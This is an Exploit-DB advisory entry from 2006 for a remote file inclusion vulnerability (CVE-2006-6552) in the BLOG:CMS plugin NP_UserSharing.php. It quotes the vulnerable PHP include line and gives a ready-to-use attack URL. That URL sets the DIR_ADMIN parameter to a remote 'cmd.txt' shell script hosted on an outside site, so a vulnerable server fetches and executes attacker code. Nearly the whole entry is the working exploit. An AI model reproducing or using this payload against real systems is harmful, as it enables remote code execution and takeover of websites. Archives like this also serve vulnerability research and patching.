BLOG:CMS <= 4.1.3 NP_UserSharing.php Remote Inclusion Vulnerability

2006-12-12T00:00:00
ID EDB-ID:2923
Type exploitdb
Reporter HACKERS PAL
Modified 2006-12-12T00:00:00

Description

BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability. CVE-2006-6552. Webapps exploit for php platform

                                        
                                            BLOG:CMS Remote file include Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

global $DIR_ADMIN;
include ( substr($DIR_ADMIN,0,strpos($DIR_ADMIN,'admin'))."photo".DIRECTORY_SEPARATOR."includes".DIRECTORY_SEPARATOR."user.class.php");

http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin

# milw0rm.com [2006-12-12]